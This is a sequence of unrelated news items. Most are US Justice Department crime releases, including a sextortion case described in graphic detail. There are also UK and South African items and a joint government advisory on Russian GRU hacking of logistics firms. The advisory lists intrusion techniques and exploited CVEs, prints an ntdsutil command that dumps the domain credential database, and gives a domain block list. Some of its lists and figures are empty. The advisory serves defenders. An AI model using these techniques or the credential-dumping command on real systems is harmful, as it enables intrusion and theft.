“Mulligan used manipulation, fear, and intimidation to exploit over 100 young victims. Now we must ensure that we send a clear message to Mulligan, and others, that those who abuse the most vulnerable members of our communities will pay a steep price,” Hayes said. “We’re committed to working with our law-enforcement partners to relentlessly pursue, prosecute, and bring to justice those who engage in these deplorable acts.”
“Chase Mulligan is a depraved and dangerous predator. He used social media to target, viciously threaten, and horribly abuse more than 100 minor victims – one as young as five years old,” DelBagno said. “His abhorrent behavior is not diminished by the fact he was thousands of miles away and never met his victims, rather, it’s the opposite. Despite his distance, he presents a serious threat to any child he can access through the internet. The FBI works diligently every day to find and arrest predators like Mulligan so they can no longer prey on innocent children.”
As detailed in the plea agreement, between at least 2019 and December 2023, Mulligan used numerous Snapchat, Discord, Roblox, Skype, Omegle, and Instagram accounts to target young girls. He convinced minors living in the United States, Canada, Denmark, Spain, Philippines, Australia, and United Kingdom to produce and send him sexually explicit images.
Mulligan also directed minors to expose their genital areas and engage in sexual conduct. Additionally, Mulligan coerced multiple girls to urinate on camera, insert objects into their genitalia, and participate in sexual acts with dogs.
After some victims informed Mulligan that they no longer wished to send him sexually explicit images, he threatened to publicly post the images or come to their homes. Mulligan wanted the victims to send more images depicting increasingly graphic sexual conduct.
As part of his plea agreement, Mulligan must register as a sex offender in places where he resides, is an employee, and is a student, under the Sex Offender Registration and Notification Act.
Mulligan is facing a mandatory minimum of 15 years and a statutory maximum of 60 years in federal prison. U.S. District Judge Theodore C. Chuang scheduled sentencing for Wednesday, August 27, at 2:30 p.m.
This case was brought as part of Project Safe Childhood, a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by the United States Attorney’s Offices and the Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute individuals who sexually exploit children, and to identify and rescue victims. For more information about Project Safe Childhood, visit www.justice.gov/psc. Click the “Resources” tab on the left side of the page to learn about Internet safety education.
U.S. Attorney Hayes commended the FBI for its work in the investigation. Ms. Hayes also thanked Assistant U.S. Attorneys Megan S. McKoy and Elizabeth Wright who are prosecuting the case.
PIERRE – United States Attorney Alison J. Ramsdell announced today that U.S. District Judge Eric C. Schulte has sentenced a Mission, South Dakota woman convicted of Larceny and Failure to Appear. The sentencing took place on May 19, 2025.
Kylie Leader Charge, age 19, was sentenced to eight months in federal prison, followed by three years of supervised release. Leader Charge was further ordered to pay a $200 special assessment to the Federal Crime Victims Fund and $1,000 in restitution.
Leader Charge was indicted by a federal grand jury in February 2024. She pleaded guilty on February 20, 2025.
The conviction for Larceny stemmed from an incident that occurred in November of 2023, within the Rosebud Sioux Indian Reservation, when Leader Charge and a co-defendant stole a vehicle near Mission, drove it in a reckless manner, and caused damage to the vehicle.
Following her Indictment, Leader Charge was released on bond. On March 21, 2024, Leader Charge failed to appear for a bail review hearing as required by her bond conditions. She was subsequently indicted for Failure to Appear.
These matters were prosecuted by the U.S. Attorney’s Office because the Major Crimes Act, a federal statute, mandates that certain violent crimes alleged to have occurred in Indian Country be prosecuted in Federal court as opposed to State court.
These cases were investigated by the Rosebud Sioux Tribe Law Enforcement Services and the United States Marshals Service. Assistant U.S. Attorney Meghan N. Dilges prosecuted the cases.
Leader Charge was immediately remanded to the custody of the U.S. Marshals Service.
Source: Federal Bureau of Investigation FBI Crime News (b)
KANSAS CITY, Mo. – A Kansas City, Mo., man was indicted by a federal grand jury on charges related to child pornography.
According to an indictment returned this week, Jeffrey Lynn Petrie, 40, of Kansas City, Mo., was charged with one count of distributing child pornography over the internet in May 2024, and one count of receiving child pornography from Dec. 9, 2024, to Dec. 10, 2024.
The indictment replaces a complaint originally filed on Friday, April 25, 2025. According to an affidavit filed in support of the criminal complaint, law enforcement officers received a Cybertip reporting that a user, “kinkypopper69,” was uploading video files depicting child sexual abuse materials. Petrie was later identified as the user “kinkypopper69.”
On April 24, 2025, the FBI conducted a search at Petrie’s residence and seized a cell phone and other electronic devices.
Petrie is a registered sex offender in Missouri based on prior convictions for child molestation in the 2nd degree.
The charges contained in this indictment are simply accusations, and not evidence of guilt. Evidence supporting the charges must be presented to a federal trial jury, whose duty is to determine guilt or innocence.
Under federal statutes, if convicted of distribution and receipt of child pornography, a prison sentence of not less than 15 years and not more than 40 years and a fine of up to $250,000 is authorized on each count. The maximum statutory sentence is prescribed by Congress and is provided here for informational purposes, as the sentencing of the defendant will be determined by the court based on the advisory sentencing guidelines and other statutory factors. A sentencing hearing will be scheduled after the completion of a presentence investigation by the United States Probation Office.
This case is being prosecuted by Assistant U.S. Attorney Teresa A. Moore. This case was investigated by the Federal Bureau of Investigation, and the Franklin County, Missouri Sheriff’s Office.
Project Safe Childhood
This case was brought as part of Project Safe Childhood, a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by the United States Attorneys’ Offices and the Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute individuals who sexually exploit children, and to identify and rescue victims. For more information about Project Safe Childhood, please visit www.usdoj.gov/psc. For more information about Internet safety education, please visit www.usdoj.gov/psc and click on the tab “resources.”
Source: Federal Bureau of Investigation FBI Crime News (b)
ALBUQUERQUE – A Shiprock man has been charged with assault with a dangerous weapon following a shooting incident outside a restaurant.
According to court documents, Navajo Nation Police responded to a 911 call reporting that an individual was shot in the hand in front of the Little Caesars Restaurant in Shiprock. Officers located the suspect, identified as TerroldTyler, 35, an enrolled member of the Navajo Nation, near the scene carrying a black backpack that contained a homemade firearm and five live shotgun shells. Tyler was detained without incident.
Investigators determined that Tyler and the victim were involved in an argument behind the restaurant prior to the shooting. Tyler allegedly produced the homemade shotgun and shot the victim in the left hand. Paramedics responded to the scene, but the victim declined medical treatment. A social media video depicting Tyler with the firearm was also recovered as evidence.
Tyler is charged with assault with a dangerous weapon and will remain in custody pending trial, which has not yet been scheduled. If convicted of the current charges, Tyler faces up to 10 years in prison.
U.S. Attorney Ryan Ellison and Philip Russell, Acting Special Agent in Charge of the Federal Bureau of Investigation’s Albuquerque Field Office made the announcement today.
The Farmington Resident Agency of the Federal Bureau of Investigation’s Albuquerque Field Office investigated this case with assistance from the Navajo Nation Police Department and Navajo Department of Criminal Investigations. Assistant U.S. Attorney Amy Mondragon is prosecuting the case.
A criminal complaint is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.
Minister of Correctional Services, Dr Pieter Groenewald, says that the country’s Self-Sufficiency and Sustainability Strategic Framework (SSSF) not only creates employment opportunities for offenders in farms, bakeries, gardens, and abattoirs, but also empowers them.
“Enabling them to produce their own food has not only empowered the offenders but also resulted in considerable savings for the South African government, “ the Minister said.
The Minister believes this demonstrates how the United Nations Standard Minimum Rules for the Treatment of Prisoners, known as the Nelson Mandela Rules, can be effectively implemented.
The Minister believes that this is one of several successful examples demonstrating how the implementation of the Nelson Mandela Rules can lead to transformative outcomes.
These outcomes equip offenders with the necessary skills and experiences to become economically independent after their rehabilitation and reintegration into society. The Minister spoke at the 34th Session of the United Nations (UN) Commission on Crime Prevention and Criminal Justice (CCPCI) held in Vienna, Austria.
This as the international community also celebrated the 10th anniversary of the rules.
The revised Nelson Mandela Rules were adopted unanimously in December 2015 by the UN General Assembly and set out the minimum standards for good prison management, including ensuring that the rights of prisoners are respected.
The Minister also took the time to urge world leaders to honour the enduring legacy of President Nelson Mandela, who was in prison for 27 years for his activism against apartheid, and the ideals of dignity, justice, and human rights that he stood for.
In addition, he called for the international community to advance a more just, inclusive, and rehabilitative approach to incarceration.
“In light of rising global prison populations, systemic overcrowding, and the urgent need for more humane and effective penal systems, the 10th Anniversary of the Nelson Mandela Rules provides a timely platform to underscore the importance of prison and penal reform.”
The Minister also took the time to urge world leaders to honour the enduring legacy of President Mandela and the ideals of dignity, justice, and human rights that he stood for.
He also took the time to acknowledge the commemoration of the 10th Anniversary of the Nelson Mandela Rules at the UN General Assembly High-Level Debate, scheduled for 13 June 2025.
The theme of the debate is “A Second Chance: Addressing the Global Prison Challenge.”
The Minister expressed support for the Bangkok Rules, which complement the Nelson Mandela Rules by addressing the specific needs and circumstances of women in the criminal justice system, requiring gender-sensitive approaches to their treatment and rehabilitation.
“Together, these two sets of international standards promote a more inclusive, equitable, and human rights–based correctional system that respects the dignity of all individuals,” he explained.
He congratulated Japan on successfully adopting the Model Strategies to Reduce Reoffending, which further supports the Nelson Mandela Rules by ensuring that rehabilitation and reintegration principles are effectively realised beyond prison walls.
“We wish to express our sincere gratitude to the UNODC [United Nations Office on Drugs and Crime] for their efforts in promoting the practical application of the rules and encourage them to continue assisting Member States in seeking innovative ways to address prison management and penal reform.”
He concluded his talk by quoting Nelson Mandela, who aptly said, “No one truly knows a nation until one has been inside its jails. A nation should not be judged by how it treats its highest citizens, but its lowest ones.” – SAnews.gov.za
Source: United Kingdom – Executive Government & Departments
News story
Waste packaging company director pays high price in data fraud
A Birmingham-based director and his company has been ordered to pay a Proceeds of Crime confiscation order, fines and costs totalling £476,995.
An officer on inspection duty. Please note the photo is an example of EA’s work not directly from this case.
This follows an Environment Agency investigation into fraudulent entry of waste packaging data.
At Birmingham Crown Court on Friday 16 May 2025, Shaobo Qin, a director of EDU Case Ltd, pleaded guilty to fraud by false representation. He was given a 2 year prison sentence suspended for 18 months.
Qin, age 42, of Sutton Coldfield, West Midlands, was also ordered to pay a Proceeds of Crime confiscation order of £255,057. He must pay within 2 months or face 3 years in prison.
He was also disqualified as a director for 4 years and ordered to do 200 hours of unpaid work.
His company, EDU Case Ltd of Portway Road, Rowley Regis, was fined £200,000. The Environment Agency were also awarded £21,995 in investigation costs.
The court was told Qin’s company was a plastics and recycling exports enterprise. The offences were discovered by the Environment Agency towards the end of 2022.
The company, orchestrated by Qin, was deliberately and systematically entering false data on to the Environment Agency’s National Packaging Waste Database (NPWD) for non-existent waste exports.
This resulted in Qin receiving a benefit for himself and his company in the sum of approx. £255,000. He was arrested on Wednesday 10 January 2024 where he was interviewed by Environment Agency officers.
EDU Case were accredited to carry out plastic packaging exports and able to issue “evidence” of that activity in the form of tonnage figures on the database.
This evidence could be bought by businesses who are obliged to account for their plastic packaging waste under the Producer Responsibility Obligations (Packaging Waste) Regulations 2007.
An audit conducted by Environment Agency officers in 2023 and information following that work identified discrepancies between the amount of waste exported and the amount of evidence issued.
The false entries represented nearly two-thirds of the business’ entire trade in 2022 towards the end of that year.
As part of that audit, a legal notice was served on Qin and the company in September 2023.
This notice required the production of their evidence of plastic waste exports. In response, Qin sent a computer memory stick containing his business’ waste export evidence and a letter explaining a large discrepancy, described as an “overclaim.”
The letter stated that the company had carried out 1,239 metric tonnes of plastic waste exports in 2022, only 453.60 metric was genuine and that the majority of his trading, 785.40 metric tonnes was ‘a mistake.’
In sentencing the judge said this was without doubt deliberate offending and pre-planned. There had been a significant undermining of the regulatory regime.
He accepted that there had been a guilty plea entered at first opportunity and that money had been put aside to repay the financial benefit made. The company was also fined to mark the seriousness of the offending.
Sham Singh, Senior Environmental Crime Officer for the Environment Agency, said:
“This case shows that the Environment Agency will pursue individuals and their enterprises who profit illegally.
“This was a fraud on a large scale and undermines legitimate business and the investment and economic growth that go with it.
“We support legitimate businesses and are proactively supporting them by disrupting and stopping the criminal element backed up by the threat of tough enforcement as in this case.
“If anyone suspects that a company is doing something wrong, please contact the Environment Agency on 0800 80 70 60 or report it anonymously to Crimestoppers on 0800 555 111.”
The Charges
Shaobo Qin
Between 1st January 2022 and 31st January 2023 dishonestly and intending thereby to make a gain for himself or another, or to cause loss to another, or to expose another to the risk of loss, made a false representation to the online National Packaging Waste Database which was and which he knew was, or might be, untrue or misleading, namely, that the 785.4 tonnes of plastic waste that he claimed EDU Case UK Ltd had exported over that period, had all actually been exported when it had not, contrary to Sections 1 and 2 of the Fraud Act 2006.
EDU Case UK Limited (Company No. 08888722)
Between 1st January 2022 and 31st January 2023 dishonestly and intending thereby to make a gain for himself or another, or to cause loss to another, or to expose another to the risk of loss, made a false representation to the online National Packaging Waste Database which was and which he knew was, or might be, untrue or misleading, namely, that the 785.4 tonnes of plastic waste that EDU Case UK Ltd had exported over that period, had all actually been exported when it had not, contrary to Sections 1 and 2 of the Fraud Act 2006.
Background Information
The Packaging Producer Responsibility Regulations were introduced to oblige the producers of waste packaging such as plastic, glass and cardboard (e.g. supermarkets) to contribute towards the financial cost of recycling and the disposal of waste. Any large organisation that meets the criteria for this obligation is required to prove they have made such financial contributions by the purchasing of credits known as Packaging Recovery Notes (PRNs) or Packaging Export Recovery Notes (PERNs) from UK waste reprocessors and waste exporters.
This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.
Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.
This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.
The following authors and co-sealers are releasing this CSA:
United States National Security Agency (NSA)
United States Federal Bureau of Investigation (FBI)
United Kingdom National Cyber Security Centre (NCSC-UK)
Germany Federal Intelligence Service (BND) Bundesnachrichtendienst
Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik
Germany Federal Office for the Protection of the Constitution (BfV) Bundesamt für Verfassungsschutz
Czech Republic Military Intelligence (VZ) Vojenské zpravodajství
Czech Republic National Cyber and Information Security Agency (NÚKIB) Národní úřad pro kybernetickou a informační bezpečnost
Czech Republic Security Information Service (BIS) Bezpečnostní informační služba
Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego
Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego
United States Cybersecurity and Infrastructure Security Agency (CISA)
United States Department of Defense Cyber Crime Center (DC3)
United States Cyber Command (USCYBERCOM)
Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
Canadian Centre for Cyber Security (CCCS)
Danish Defence Intelligence Service (DDIS) Forsvarets Efterretningstjeneste
Estonian Foreign Intelligence Service (EFIS) Välisluureamet
Estonian National Cyber Security Centre (NCSC-EE) Küberturvalisuse keskus
French Cybersecurity Agency (ANSSI) Agence nationale de la sécurité des systèmes d’information
Netherlands Defence Intelligence and Security Service (MIVD) Militaire Inlichtingen- en Veiligheidsdienst
For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions. In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments. Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK tactics and techniques for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0.
Description of Targets
The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations:
Defense Industry
Transportation and Transportation Hubs (ports, airports, etc.)
Maritime
Air Traffic Management
IT Services
In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199].
The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043].
The countries with targeted entities include the following, as illustrated in Figure 1:
Bulgaria
Czech Republic
France
Germany
Greece
Italy
Moldova
Netherlands
Poland
Romania
Slovakia
Ukraine
United States
Figure 1: Countries with Targeted Entities
Initial Access TTPs
To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to):
The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2]
Credential Guessing/Brute Force
Unit 26165 actors’ credential guessing [T1110.001] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.” [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573].
Spearphishing
GRU unit 26165 actors’ spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target’s native language and sent to a single targeted recipient.
Some campaigns employed multi-stage redirectors [T1104] verifying IP-geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com. Redirector services used include:
Webhook[.]site
FrgeIO
InfinityFree
Dynu
Mocky
Pipedream
Mockbin[.]org
The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [T1204.002] delivered via third-party services and redirectors [T1566.002], scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]) and links to hosted shortcuts [T1204.001].
CVE Usage
Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114].
Since at least fall 2023, the actors leveraged a WinRAR vulnerability (CVE-2023-38831) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE.
Post-Compromise TTPs
After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002].
The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command:
C:Windowssystem32ntdsutil.exe "activate instance ntds" ifm "create full C:temp[a-z]{3}" quit quit
Figure 2: Example Active Directory Domain Services command
Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048].
Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [6]
After initial authentication, unit 26165 actors would change accounts’ folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [T1556.006]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001].
After gaining initial access to the network, the actors pursued further access to accounts with access to sensitive information on shipments, such as train schedules and shipping manifests. These accounts contained information on aid shipments to Ukraine, including:
sender,
recipient,
train/plane/ship numbers,
point of departure,
destination,
container registration numbers,
travel route, and
cargo contents.
In at least one instance, the actors attempted to use voice phishing [T1566.004] to gain access to privileged accounts by impersonating IT staff.
Malware
Unit 26165’s use of malware in this campaign ranged from gaining initial access to establishing persistence and exfiltrating data. In some cases, the attack chain resulted in multiple pieces of malware being deployed in succession. The actors used dynamic link library (DLL) search order hijacking [T1574.001] to facilitate malware execution. There were a number of known malware variants tied to this campaign against logistics sector victims, including:
While other malware variants, such as OCEANMAP and STEELHOOK, [8] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggest that they could be deployed against logistics and IT entities should the need arise.
Persistence
In addition to the abovementioned mailbox permissions abuse, unit 26165 actors also used scheduled tasks [T1053.005], run keys [T1547.001], and placed malicious shortcuts [T1547.009] in the startup folder to establish persistence.
Exfiltration
GRU unit 26165 actors used a variety of methods for data exfiltration that varied based on the victim environment, including both malware and living off the land binaries. PowerShell commands [T1059.001] were often used to prepare data for exfiltration; for example, the actors prepared zip archives [T1560.001] for upload to their own infrastructure.
The actors also used server data exchange protocols and Application Programming Interfaces (APIs) such as Exchange Web Services (EWS) and Internet Message Access Protocol (IMAP) [T1114.002] to exfiltrate data from email servers. In multiple instances, the actors used periodic EWS queries [T1119] to collect new emails sent and received since the last data exfiltration [T1029]. The actors typically used infrastructure in close geographic proximity to the victim. Long gaps between exfiltration, the use of trusted and legitimate protocols, and the use of local infrastructure allowed for long-term collection of sensitive data to go undetected.
Connections to Targeting of IP Cameras
In addition to targeting logistics entities, unit 26165 actors likely used access to private cameras at key locations, such as near border crossings, military installations, and rail stations, to track the movement of materials into Ukraine. The actors also used legitimate municipal services, such as traffic cams.
The actors targeted Real Time Streaming Protocol (RTSP) servers hosting IP cameras primarily located in Ukraine as early as March 2022 in a large-scale campaign, which included attempts to enumerate devices [T1592] and gain access to the cameras’ feeds [T1125]. Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers, primarily hosting IP cameras [T1090.002]. The DESCRIBE requests were crafted to obtain access to IP cameras located on logically distinct networks from that of the routers that received the request. The requests included Base64-encoded credentials for the RTSP server, which included publicly documented default credentials and likely generic attempts to brute force access to the devices [T1110]. An example of an RTSP request is shown in Figure 3.
Successful RTSP 200 OK responses contained a snapshot of the IP camera’s image and IP camera metadata such as video codec, resolution, and other properties depending on the IP camera’s configuration.
From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1:
Table 1: Geographic distribution of targeted IP cameras
Country
Percentage of Total Attempts
Ukraine
81.0%
Romania
9.9%
Poland
4.0%
Hungary
2.8%
Slovakia
1.7%
Others
0.6%
Mitigation Actions
General Security Mitigations
Architecture and Configuration
Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions [D3-AMED].
Consider Zero Trust principles when designing systems. Base product choices on how those products can solve specific risks identified as part of the end-to-end design. [9]
Ensure that host firewalls and network security appliances (e.g., firewalls) are configured to only allow legitimately needed data flows between devices and servers to prevent lateral movement [D3-ITF]. Alert on attempts to connect laterally between host devices or other unusual data flows.
Use automated tools to audit access logs for security concerns and identify anomalous access requests [D3-RAPA].
For organizations using on-premises authentication and email services, block and alert on NTLM/SMB requests to external infrastructure [D3-OTF].
Utilize endpoint, detection, and response (EDR) and other cybersecurity solutions on all systems, prioritizing high value systems with large amounts of sensitive data such as mail servers and domain controllers [D3-PM] first.
Perform threat and attack modeling to understand how sensitive systems may be compromised within an organization’s specific architecture and security controls. Use this to develop a monitoring strategy to detect compromise attempts and select appropriate products to enact this strategy.
Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly [D3-SFA].
Enable optional security features in Windows to harden endpoints and mitigate initial access techniques [D3-AH]:
Enable attack surface reduction rules to prevent executable content from email [D3-ABPI].
Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA% [D3-EAL].
Unless users are involved in the development of scripts, limit the local execution of scripts (such as batch scripts, VBScript, JScript/JavaScript, and PowerShell [10]) to known scripts [D3-EI], and audit execution attempts.
Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode [D3-ACH].
Where feasible, implement allowlisting for applications and scripts to limit execution to only those needed for authorized activities, blocking all others by default [D3-EAL].
Consider using open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters [D3-PSA].
Use services that provide enhanced browsing services and safe link checking [D3-URA]. Significant reductions in successful spearphishing attempts were noted when email providers began offering link checking and automatic file detonation to block malicious content.
Where possible, block logins from public VPNs, including exit nodes in the same country as target systems, or, if they need to be allowed, alert on them for further investigation. Most organizations should not need to allow incoming traffic, especially logins to systems, from VPN services [D3-NAM].
Educate users to only use approved corporate systems for relevant government and military business and avoid the use of personal accounts on cloud email providers to conduct official business. Network administrators should also audit both email and web request logs to detect such activity.
Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165. Organizations should consider alerting on or blocking the following services, with exceptions allowlisted for legitimate activity [D3-DNSDL].
*.000[.]pe
*.1cooldns[.]com
*.42web[.]io
*.4cloud[.]click
*.accesscan[.]org
*.bumbleshrimp[.]com
*.camdvr[.]org
*.casacam[.]net
*.ddnsfree[.]com
*.ddnsgeek[.]com
*.ddnsguru[.]com
*.dynuddns[.]com
*.dynuddns[.]net
*.free[.]nf
*.freeddns[.]org
*.frge[.]io
*.glize[.]com
*.great-site[.]net
*.infinityfreeapp[.]com
*.kesug[.]com
*.loseyourip[.]com
*.lovestoblog[.]com
*.mockbin[.]io
*.mockbin[.]org
*.mocky[.]io
*.mybiolink[.]io
*.mysynology[.]net
*.mywire[.]org
*.ngrok[.]io
*.ooguy[.]com
*.pipedream[.]net
*.rf[.]gd
*.urlbae[.]com
*.webhook[.]site
*.webhookapp[.]com
*.webredirect[.]org
*.wuaze[.]com
Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [D3-DNRA]. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.
Identity and Access Management
Organizations should take measures to ensure strong access controls and mitigate against common credential theft techniques:
Use MFA with strong factors, such as passkeys or PKI smartcards, and require regular re-authentication [D3-MFA]. [11], [12] Strong authentication factors are not guessable using dictionary techniques, so they resist brute force attempts.
Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts [D3-JFAPA].
Separate privileged accounts by role and alert on misuse of privileged accounts [D3-UAP]. For example, email administrator accounts should be different from domain administrator accounts.
Reduce reliance on passwords; instead, consider using services like single sign-on [D3-TBA].
For organizations using on-premises authentication and email services, plan to disable NTLM entirely and migrate to more robust authentication processes such as PKI certificate authentication.
Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts [D3-CH]. [13]
Use account throttling or account lockout [D3-ANET]:
Throttling is preferred to lockout. Throttling progressively increases time delay between successive login attempts.
Account lockout can leave legitimate users unable to access their accounts and requires access to an account recovery process.
Account lockout can provide a malicious actor with an easy way to launch a Denial of Service (DoS).
If using lockout, then allowing 5 to 10 attempts before lockout is recommended.
Use a service to check for compromised passwords before using them [D3-SPP]. For example, “Have I Been Pwned” can be used to check whether a password has been previously compromised without disclosing the potential password.
Change all default credentials [D3-CRO] and disable protocols that use weak authentication (e.g., clear-text passwords or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication [D3-ACH] [D3-ET]. Always configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. [13]
IP Camera Mitigations
The following mitigation techniques for IP cameras can be used to defend against this type of malicious activity:
Ensure IP cameras are currently supported. Replace devices that are out of support.
Apply security patches and firmware updates to all IP cameras [D3-SU].
Disable remote access to the IP camera, if unnecessary [D3-ITF].
Ensure cameras are protected by a security appliance, if possible, such as by using a firewall to prevent communication with the camera from IP addresses not on an allowlist [D3-NAM].
If remote access to IP camera feeds is required, ensure authentication is enabled [D3-AA] and use a VPN to connect remotely [D3-ET]. Use MFA for management accounts if supported [D3-MFA].
Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers [D3-NI].
Turn off other ports/services not in use (e.g., FTP, web interface, etc.) [D3-ACH].
If supported, enable authenticated RTSP access only [D3-AA].
Review all authentication activity for remote access to make sure it is valid and expected [D3-UBA]. Investigate any unexpected or unusual activity.
Audit IP camera user accounts to ensure they are an accurate reflection of your organization and that they are being used as expected [D3-UAP].
Configure, tune, and monitor logging—if available—on the IP camera.
Indicators of Compromise (IOCs)
